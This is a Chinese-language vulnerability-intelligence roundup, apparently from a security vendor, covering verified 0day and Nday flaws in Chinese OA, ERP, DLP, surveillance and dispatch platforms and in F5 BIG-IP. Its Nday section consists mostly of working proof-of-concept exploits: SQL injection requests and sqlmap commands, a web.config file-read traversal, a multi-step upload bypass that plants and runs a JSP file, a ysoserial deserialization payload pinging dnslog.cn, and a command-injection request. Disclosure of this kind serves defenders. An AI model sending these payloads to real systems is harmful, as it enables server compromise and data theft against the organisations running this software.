wb近期流传漏洞-验真情报合集
2024-7-24 17:22:29 Author: govuln.com(查看原文) 阅读量:278 收藏

免责声明

本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,由于传播、利用此文所提供的内容或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关,本次测试仅供学习使用。如有内容争议或侵权,请及时私信我们!我们会立即删除并致歉。谢谢!

一、已验真的 0day 漏洞

1. 通天星主动安全监控云平台远程代码执行漏洞(XVE-2023-36633)

来源:X 漏洞奖励计划

影响版本:version <= V7.32.0.2

临时缓解措施:

 使用防护类设备对相关资产进行防护,拦截请求中出现的恶意 SQL 语句。

 如非必要,避免将资产暴露在互联网。

详情信息:

该漏洞仍处于 0day 状态,暂不公开提供。如有需要请联系微步支持。

2. H3C Workspace 云桌面 远程命令执行漏洞(XVE-2024-8180)

来源:X 漏洞奖励计划

影响版本:version <= E1013P13

临时缓解措施:

 使用防护类设备对相关资产进行防护,拦截请求中出现的恶意命令执行语句。

 如非必要,避免将资产暴露在互联网。

详情信息:

该漏洞仍处于 0day 状态,暂不公开提供。如有需要请联系微步支持。

3. 润乾报表前台任意文件上传漏洞(XVE-2023-2519)

来源:X 漏洞奖励计划

影响版本:version <= 20221210

临时缓解措施:

 使用防护类设备对相关资产进行防护,拦截请求中出现的恶意 jsp 代码和../路径穿越字符。

 如非必要,避免将资产暴露在互联网。

详情信息:

该漏洞仍处于 0day 状态,暂不公开提供。如有需要请联系微步支持。

二、已验真的 1day/Nday 漏洞

1、通天星 CMSV6 车载视频监控平台 disable 存在SQL 注入漏洞(XVE-2024-17935)

GET /edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36

2. 亿赛通数据泄露防护(DLP)系统 NetSecConfigAjax SQL注入漏洞(XVE-2024-17936)

POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1Host:Content-Type: application/x-www-form-urlencoded command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--

3. 亿赛通数据泄露防护(DLP)系统 NoticeAjax SQL 注入漏洞(XVE-2024-17938)

POST /CDGServer3/NoticeAjax;Service HTTP/1.1Host:Content-Type: application/x-www-form-urlencodedcommand=delNotice&noticeId=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--

4. 天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞(XVE-2024-17939)

GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

5. 启明星辰 天玥网络安全审计系统 SQL 注入漏洞(XVE-2023-5892)

python sqlmap.py -u "https://ip/ops/index.php?c=Reportguide&a=checkrn"--data "checkname=123&tagid=123" --skip-waf --random-agent --dbs --batch--force-ssl

6. 致远 OA fileUpload.do 前台文件上传绕过漏洞(XVE-2024-8166)

1、上传图片马,返回 fileid 值
POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUploadHTTP/1.1Host:Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-Type: multipart/form-data; boundary=00content0boundary00User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287c9dfb30)Content-Length: 754
--00content0boundary00Content-Disposition: form-data; name="type"
--00content0boundary00Content-Disposition: form-data; name="extensions"
png--00content0boundary00Content-Disposition: form-data; name="applicationCategory"
--00content0boundary00Content-Disposition: form-data; name="destDirectory"
--00content0boundary00Content-Disposition: form-data; name="destFilename"
--00content0boundary00Content-Disposition: form-data; name="maxSize"
--00content0boundary00Content-Disposition: form-data; name="isEncrypt"
false--00content0boundary00Content-Disposition: form-data; name="file1"; filename="1.png" Content-Type: Content-Type: application/pdf
<% out.println("hello");%>--00content0boundary00--

2、修改文件后缀为 jsp
POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1Host:Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)Content-Length: 64
method=uploadMenuIcon&fileid=ID值&filename=qwe.jsp

3、访问 jsp 文件触发恶意 jsp 代码
GET /seeyon/main/menuIcon/qwe.jsp HTTP/1.1Host:

7. F5 BIG-IP 远程代码执行漏洞(XVE-2023-29359)

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-46747.yaml

8. 用友 U8 cloud MonitorServlet 反序列化漏洞(XVE-2023-28865)

使用 ysoserial 工具生成恶意序列化数据
java -jar ysoserial.jar CommonsCollections6 "ping dnslog.cn" > obj.ser
POST /service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
恶意序列化数据

9. 万户 OA SQL 注入漏洞(XVE-2023-26186)

python sqlmap.py -u "http://xxxxxxxxx/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1" --level 3 --dbs

10. 锐捷 RG-NBS2026G-P 交换机WEB 管理ping.htm未授权访问漏洞(XVE-2024-17942)

https://x.threatbook.com/v5/vul/XVE-2024-17942 
详情信息:/safety/ping.htm

11. 福建科立讯通信 指挥调度管理平台ajax_users.php信息泄露漏洞(XVE-2024-17952)

漏洞信息:https://x.threatbook.com/v5/vul/XVE-2024-17952
详情信息:/app/ext/ajax_users.php

12. 福建科立讯通信 指挥调度管理平台ajax_users.phpSQL注入漏洞(XVE-2024-15986)

POST /app/ext/ajax_users.php HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0infoContent-Type: application/x-www-form-urlencoded
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

13. 福建科立讯通信 指挥调度管理平台存在远程命令执行漏洞(XVE-2023-36635)

GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=%60echo%20test%3Etest.txt%60 HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36Accept-Encoding: gzip, deflateAccept: */* Connection: keep-alive

三、未复现成功的漏洞 

  1. 北京筑业建设工程资料同步跟踪检查与流转交互云平台密码重置漏洞

  2. 同鑫科技 EHR 系统全系列 SQL 注入漏洞

  3. 金和 OA C6CreateGroup 接口注入漏洞

作者:微步研究响应中心(微步在线)
关注公众号:实战安全研究

文章来源: https://govuln.com/news/url/yZd4
如有侵权请联系:admin#unsafe.sh